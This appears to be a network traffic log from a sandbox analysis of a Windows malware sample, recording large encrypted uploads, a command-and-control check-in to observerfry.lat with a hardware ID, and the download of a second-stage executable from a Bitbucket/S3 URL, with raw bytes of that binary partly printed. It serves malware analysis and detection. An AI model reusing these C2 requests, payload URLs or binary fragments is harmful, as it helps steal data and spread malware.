2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: 35 2c 5a 5e a4 cb a1 df 1b 5c 02 21 a6 5c db df a8 e9 1a 28 ce 4b 8e 87 95 51 33 ff ea ee 3f 2b 83 a2 5e 34 4f d4 d5 69 e6 74 46 83 f7 4d b1 c0 54 57 3a 66 9a ef 35 6c c7 ad 3b fb e0 41 b6 ff 88 a2 18 25 63 70 5f e2 59 f2 df 1d 4e c8 e5 b9 ea 28 e1 09 c5 d8 38 85 6b 6c 35 5b d4 7e a9 f3 8b 86 47 7a 31 e0 bd 65 1b 42 c3 20 d0 1e 98 56 e3 33 32 9e a3 1f 05 c6 2c fd 5e 1a 90 cf a9 36 e0 75 40 fe 84 44 e8 e9 cd b3 97 71 bd 39 75 fa 96 14 25 64 3e 79 7e 64 d0 2a 8c 12 09 c6 30 4a c3 4e 92 54 b9 95 76 91 fc 8a bc 70 bc 12 2e 71 3e c9 9a c1 cc 74 bb 90 25 1d 9c ec bd 39 9a 8a d0 0b d1 ae 21 a2 03 a7 67 3b 45 f2 eb c3 5c 0e 98 3b a0 ea 41 7a 8d 4a 9d 87 8b d3 3d ae c1 0e 41 73 36 c1 26 ea ab 68 9c b2 6b 8e d3 75 d2 2b 60 6a 1d 80 45 1f b6 8b 97 49 7d f2 1b 57 61 Data Ascii: 5,Z^\!\(KQ3?+^4OitFMTW:f5l;A%cp_YN(8kl5[~Gz1eB V32,^6u@Dq9u%d>y~d*0JNTvp.q>t%9!g;E\;AzJ=As6&hku+`jEI}Wa
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: ee 4c 52 f8 c0 6d 54 ab 91 d1 99 89 37 27 e7 aa 8a d0 b0 a5 9a e6 4a 3e 06 f2 b9 e8 17 bc 81 a3 11 f1 fd dd 4f 02 61 5c 10 1d 07 e0 f0 12 5f 19 5a 05 8b 62 a9 bf 79 c5 a5 59 95 87 09 13 13 0a c0 b7 c9 2c 2c 96 2d aa 67 1d 8b ae 1a 42 10 b3 7d 5a c7 74 d8 66 87 28 0c 07 d9 4a 18 7f 2c 92 d1 77 56 14 9a 88 6e 37 39 22 05 25 42 fe 43 47 74 9f 85 2f 8f 4c 7a 7d 90 05 8a cf 83 e9 1e 4d ca cb 16 a8 43 c0 b7 2a c0 19 3a b4 d8 89 51 14 38 b6 90 3e 13 db 03 28 d7 64 dc ce 7d 95 be 8d bc cb a5 26 c0 c9 d6 fe 97 1d 86 10 8a 10 03 6b b8 72 59 f0 fa 43 9b 75 52 bc 2d d6 e9 08 fb 68 50 7c 88 a3 a5 db 58 b1 a0 e8 66 d6 a5 c6 ac 16 da ba 8e 7d a5 d0 f8 a8 04 9e 07 d7 9e eb d4 65 66 1d 1a f6 e0 ef 73 a0 47 c1 99 40 e1 1f 4e 5b 6b 54 05 79 64 b5 8d 84 cb 13 4c 4a a0 f3 fc Data Ascii: LRmT7'J>Oa\_ZbyY,,-gB}Ztf(J,wVn79"%BCGt/Lz}MC*:Q8>(d}&krYCuR-hP\|Xf}efsG@N[kTydLJ
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: de 52 a2 23 05 17 08 d1 85 7e 1e 9f 5e 4b 8f 68 11 4f f8 f5 03 5f c0 ec 8c 42 9c e2 43 94 71 22 37 fa b3 50 14 2d 0d 25 cc 2f 50 f8 57 cf c9 bb 11 f9 28 34 c5 c2 21 24 48 f5 57 9d d3 cb 3c 23 ad e6 69 ef b3 c3 f1 ec d7 6e e3 0a 0f 4e 30 50 75 ce fb 41 9d 6e b2 b1 da c5 4c 7b 93 dc 42 4b 93 07 c6 03 49 d5 16 03 f3 69 0a ce e0 28 df c3 69 a9 62 ee 3e a1 d3 06 48 e1 e7 e8 ec 07 8c 97 8a 00 af e2 fb 95 08 23 98 73 ef 11 46 1d b6 78 fa 3f e4 cb c4 9f db 02 5a 10 fc 97 54 0c 1a ae 92 42 d1 8f 0a 2f 5c 68 eb 80 e0 07 22 99 9d bc ad 07 9f df 9c c8 71 72 0b 5c fe 31 19 fb e3 92 c9 cb 74 cd a1 1e d9 0a f9 e9 8f 5f 86 e2 c2 02 da cf fc d5 f4 ec ef e4 04 4f b6 ad a4 d6 d8 1c 7a 48 2e b3 99 5e 5f d3 a1 c8 2b 39 f9 cd e4 ce ae 5a f7 a7 94 5c e0 79 b5 2a eb 7f 27 f3 dc Data Ascii: R#~^KhO_BCq"7P-%/PW(4!$HW<#inN0PuAnL{BKIi(ib>H#sFx?ZTB/\h"qr\1t_OzH.^_+9Z\y*'
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: f8 1d 29 72 d8 bb 69 1b 61 3e 2b c2 6b ef 8d 91 a4 61 ae 9d 87 22 06 88 74 79 84 d5 11 bb 26 41 f6 57 35 c2 75 45 2d 9d af 4c 1b 8c 11 b1 f1 27 61 42 e4 f4 58 a5 28 20 c2 af 22 02 63 3e cb 7f aa 31 34 08 37 e0 e7 02 7e c5 21 e7 48 eb 97 48 5c 95 e8 6e 10 05 eb 74 b7 9c 8c e2 15 16 5b f3 4a 29 c2 96 05 ef af 35 3b 45 c6 6f fc e3 32 af 24 5f 2c 0c ee ee a2 8b 03 d4 dc 01 50 67 37 f6 58 48 c7 56 82 d8 05 96 ec 05 34 7d e5 46 93 13 b1 f8 fd 36 0f 14 ed f7 07 65 83 56 23 92 1b a1 2b 40 cd 9e 16 34 ac c1 ab 6b b3 fe c9 f1 06 45 71 0d bd 06 15 a4 51 22 d4 39 92 cb d7 7d 10 ef 65 8b 64 6e 21 7d a8 26 66 66 b1 10 13 12 32 66 1a ef 21 da ed 1d 1d e2 ee 13 ba 06 a7 44 84 dd 54 f2 6c 11 24 d3 ab 42 17 1d 2f 67 4d cd 73 e7 e6 f7 ee 00 d9 c3 9b 2f 05 c0 8c fe 36 b1 10 Data Ascii: )ria>+ka"ty&AW5uE-L'aBX( "c>147~!HH\nt[J)5;Eo2$_,Pg7XHV4}F6eV#+@4kEqQ"9}edn!}&ff2f!DTl$B/gMs/6
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: e4 0e 71 e5 eb 67 b7 80 ef 80 8f 23 a4 1d e1 97 36 58 84 90 83 5b af ac 8f ad d9 f1 0f 6e e5 ae 99 7d 19 bc b6 6b 7d f9 bf f5 01 3c eb 4f 5f 70 6a f9 c2 1f 9a 6b ff 64 b3 10 04 a7 86 b3 62 dd 5f 5a 9d c6 a9 d7 9c 3c 2c 5a e7 9d c2 10 56 d8 a7 1e c1 c0 43 99 fd 09 af f8 6b 01 48 91 f3 f7 6c 63 b6 b6 fe b7 f5 ec fd 68 e7 d4 c4 28 e7 ca ed 9e 52 c5 ec 6b 39 4e b0 29 88 c8 80 7c 09 6a f5 0e 18 f0 92 c4 6e c1 01 34 ef f0 66 70 68 63 ec 63 71 14 1c 6b 94 1f 19 04 8d 17 dd 26 d8 49 0b 28 16 da 53 08 9a f2 7f fd 09 b3 b1 a9 ea 9f 44 2a 16 d8 1f b4 cc 99 b8 5d ca 40 3f 28 e1 e8 80 42 82 be 55 dd f1 85 3c 4d c4 5b 98 30 17 ef 39 b1 74 90 51 51 5c 00 89 6a 78 5d 97 78 d2 7e 66 8f 64 ca 63 e9 4b a9 0c 4d 6a 12 93 0e 33 bf ff 49 d2 87 48 aa e9 de b8 b8 05 c8 37 91 78 Data Ascii: qg#6X[n}k}<O_pjkdb_Z<,ZVCkHlch(Rk9N)\|jn4fphccqk&I(SD*]@?(BU<M[09tQQ\jx]x~fdcKMj3IH7x
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: 56 be 9d 3a 4b 41 e8 a2 7c b4 3f 50 43 98 4d d7 6f 7b 7c 91 2f ad c4 d8 c9 11 e4 30 96 0a 95 18 17 c3 79 08 b1 76 62 a9 1a d0 bd 49 dc e2 e6 d1 83 5d 02 af c4 d9 e6 37 16 4f 71 5c b3 34 24 dd b5 f4 82 70 0c d5 83 7b 71 4b b8 55 b9 e9 5f 4a 94 58 e4 26 dc 84 01 49 45 95 f4 34 ad 05 f5 dc 4b 08 b7 44 31 29 b7 ab 51 49 0d 45 31 41 a8 cc d2 6f 11 ca 0f bc 08 96 34 2a 30 60 81 e3 28 78 9e 1d 7f 84 1c bb 7a 3d b6 60 23 66 4a f2 cb d6 e5 96 4f 90 2e 0d a5 ef 41 44 c9 33 82 7e 47 ed a7 77 08 45 fb 1b f1 68 c7 29 72 c2 56 dc 2e b9 c7 b0 ef c6 21 80 55 00 8a 50 11 2c 3b 0f cc f0 93 fd 37 bd 05 2e 71 fa 06 61 f4 c9 2b ee 9a c5 ff 52 f1 e3 4a a0 8a af f3 8e a2 e0 62 51 a3 fa e0 21 ea de f3 06 6e 5d 18 b6 9c e2 40 36 04 15 fd 16 d8 35 2d 50 bd 42 2e 76 b9 9c 9c 52 27 Data Ascii: V:KA\|?PCMo{\|/0yvbI]7Oq\4$p{qKU_JX&IE4KD1)QIE1Ao4*0`(xz=`#fJO.AD3~GwEh)rV.!UP,;7.qa+RJbQ!n]@65-PB.vR'
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: 81 7d 0f d1 1d 84 c8 07 fe 4a 9a ce c8 dd 56 3e 2f d3 ad ef 75 bc 89 e6 74 9f ea 1f 09 98 7f f4 79 46 85 1a 54 12 f5 4e c2 48 a8 87 12 e3 09 7f f8 9c 39 13 73 41 bd d7 3e 46 3d 39 fa 37 69 f3 38 52 a7 de d7 e8 8a 75 52 42 42 57 44 64 f1 e9 6e 99 3b 8e 70 96 be 7d 8d aa 32 03 2f 2f 84 2d 32 2f 79 65 60 74 74 ca b2 04 cb 36 44 e6 36 29 ad 3d d5 8f 20 ed 78 08 df 67 54 09 08 3c 7f a8 13 9b 12 3c 5f 6d bc fc ed 6a 4b e5 1f a1 b1 81 15 3f 0c 0f c7 a7 ad 97 61 c3 f3 42 bf e9 9e 0e fb 7a 1f 03 27 92 fd aa 83 97 7f 7d b8 ba 5e 97 59 6e 20 1e f6 f5 8d cb 0d a6 13 bf ed f6 d5 ba 3f ff f5 dd 92 de 56 fe 5e 85 f7 6f 30 e7 9e 43 ff 8f f8 b0 1e ef 9b 53 da 57 bf cf da 05 24 a7 71 5f 77 75 f5 75 92 43 ea bc 9d 82 5e 76 9d 9e 49 f5 68 99 37 e9 aa e4 f4 05 cd 54 8e 55 4f Data Ascii: }JV>/utyFTNH9sA>F=97i8RuRBBWDdn;p}2//-2/ye`tt6D6)= xgT<<_mjK?aBz'}^Yn ?V^o0CSW$q_wuuC^vIh7TUO
2024-12-24 07:54:06 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:54:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bsi23h1412r0caing43k2gs15s; expires=Sat, 19 Apr 2025 01:40:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKDUpEe99UxTLklFD6RmWLFie937qvG4HQHYfU7o0ImE0TA3oXU2qMBkxkH%2FjMyCXPIeNvJPormCMU9orfp8GGM3cUrr3iAeYrdzY1xAodlF3PAlMmxTPB2bNLDLkOedZWg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f05667d308c4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1786&rtt_var=687&sent=384&recv=607&lost=0&retrans=0&sent_bytes=2836&recv_bytes=588326&delivery_rate=1574123&cwnd=205&unsent_bytes=0&cid=cda038eab9d0568c&ts=3629&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49740	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:54:07 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: observerfry.lat
2024-12-24 07:54:07 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 38 41 43 41 32 46 37 34 46 32 41 37 32 45 41 33 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=8ACA2F74F2A72EA3BEBA0C6A975F1733
2024-12-24 07:54:08 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vom9h83dp0r3ii3cjiifjqfvkv; expires=Sat, 19 Apr 2025 01:40:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2F0bNwov%2BkkdneREpFlrGDW7CMfXulbxh%2BzcFsuZ2P%2ByMO06cYhDHnkQf6V2%2B7DgX9bOFftRwHNrGsOS3884yafmGKAPPhNEMSM2mI5Uohpvayie1N901fKtkRJtwQ5xVvw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f0587bcee42d1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1741&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=987&delivery_rate=1660034&cwnd=194&unsent_bytes=0&cid=405ee9c61285787d&ts=912&x=0"
2024-12-24 07:54:08 UTC	242	IN	Data Raw: 31 31 30 0d 0a 4a 46 58 5a 4a 39 2f 78 70 55 52 73 77 33 50 42 64 75 73 6d 31 6c 30 78 4c 66 59 4f 52 54 57 6d 73 56 31 49 61 51 4c 6c 59 76 39 2f 4c 76 74 53 2f 63 75 48 4c 42 69 33 41 37 4a 4d 74 77 6d 4b 63 6c 4e 45 67 6d 77 77 56 73 33 55 4b 57 59 47 63 49 49 2b 30 45 6b 73 74 30 4b 6f 68 73 6f 32 42 37 41 44 6f 42 57 4f 46 2b 52 75 41 68 7a 45 55 6d 70 47 78 64 38 35 46 45 5a 6d 69 68 57 52 53 44 71 34 51 36 79 74 69 67 49 44 73 52 36 67 41 70 39 50 75 44 70 79 52 5a 64 38 4c 45 48 48 30 7a 45 74 52 32 65 64 42 39 30 49 64 37 39 54 2f 63 75 56 61 45 36 6d 55 66 74 48 6c 67 71 74 66 30 51 50 7a 43 77 74 51 64 4c 42 5a 78 52 47 58 73 70 54 78 78 46 37 36 78 62 71 33 35 52 31 58 2b 31 43 39 79 72 45 53 62 41 37 62 Data Ascii: 110JFXZJ9/xpURsw3PBdusm1l0xLfYORTWmsV1IaQLlYv9/LvtS/cuHLBi3A7JMtwmKclNEgmwwVs3UKWYGcII+0Ekst0Kohso2B7ADoBWOF+RuAhzEUmpGxd85FEZmihWRSDq4Q6ytigIDsR6gAp9PuDpyRZd8LEHH0zEtR2edB90Id79T/cuVaE6mUftHlgqtf0QPzCwtQdLBZxRGXspTxxF76xbq35R1X+1C9yrESbA7b
2024-12-24 07:54:08 UTC	37	IN	Data Raw: 51 4b 53 61 79 4d 62 77 38 6b 34 61 6b 55 67 67 78 62 64 48 6d 58 31 42 62 72 54 6e 33 55 52 6e 67 3d 3d 0d 0a Data Ascii: QKSayMbw8k4akUggxbdHmX1BbrTn3URng==
2024-12-24 07:54:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49746	185.166.143.50	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:54:10 UTC	248	OUT	GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bitbucket.org
2024-12-24 07:54:10 UTC	5943	IN	HTTP/1.1 302 Found Date: Tue, 24 Dec 2024 07:54:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQp [TRUNCATED] Expires: Tue, 24 Dec 2024 07:54:10 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: c32ba316cc8a X-Version: c9b3998323c0 X-Static-Version: c9b3998323c0 X-Request-Count: 271 X-Render-Time: 0.04346323013305664 X-B3-Traceid: 1e30b1ceefe14414967ebe194274b62f X-B3-Spanid: d4d182752d32b88e X-Frame-Options: SAMEORIGIN Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public [TRUNCATED] X-Usage-Quota-Remaining: 999272.873 X-Usage-Request-Cost: 739.93 X-Usage-User-Time: 0.020694 X-Usage-System-Time: 0.001504 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 1e30b1ceefe14414967ebe194274b62f Atl-Request-Id: 1e30b1ce-efe1-4414-967e-be194274b62f Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=152,atl-edge-internal;dur=3,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49752	52.217.14.36	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:54:12 UTC	1352	OUT	GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FY [TRUNCATED] Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bbuseruploads.s3.amazonaws.com
2024-12-24 07:54:12 UTC	554	IN	HTTP/1.1 200 OK x-amz-id-2: lgNalwbvhPqbcwjxDb73yhIWCOmZB9G75AVuEKnNaF1qBhl/HAxtmMqkU+8UOFzqAF+GnBnYFD0= x-amz-request-id: QCMGMWH77WFWWANJ Date: Tue, 24 Dec 2024 07:54:13 GMT Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT ETag: "73565a0bcdcb7ff5f9ce005a2530e215" x-amz-server-side-encryption: AES256 x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS Content-Disposition: attachment; filename="FormattingCharitable.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 1325507 Server: AmazonS3 Connection: close
2024-12-24 07:54:12 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
2024-12-24 07:54:12 UTC	470	IN	Data Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39 Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;\|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
2024-12-24 07:54:12 UTC	16384	IN	Data Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;\|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
2024-12-24 07:54:12 UTC	1024	IN	Data Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20 Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
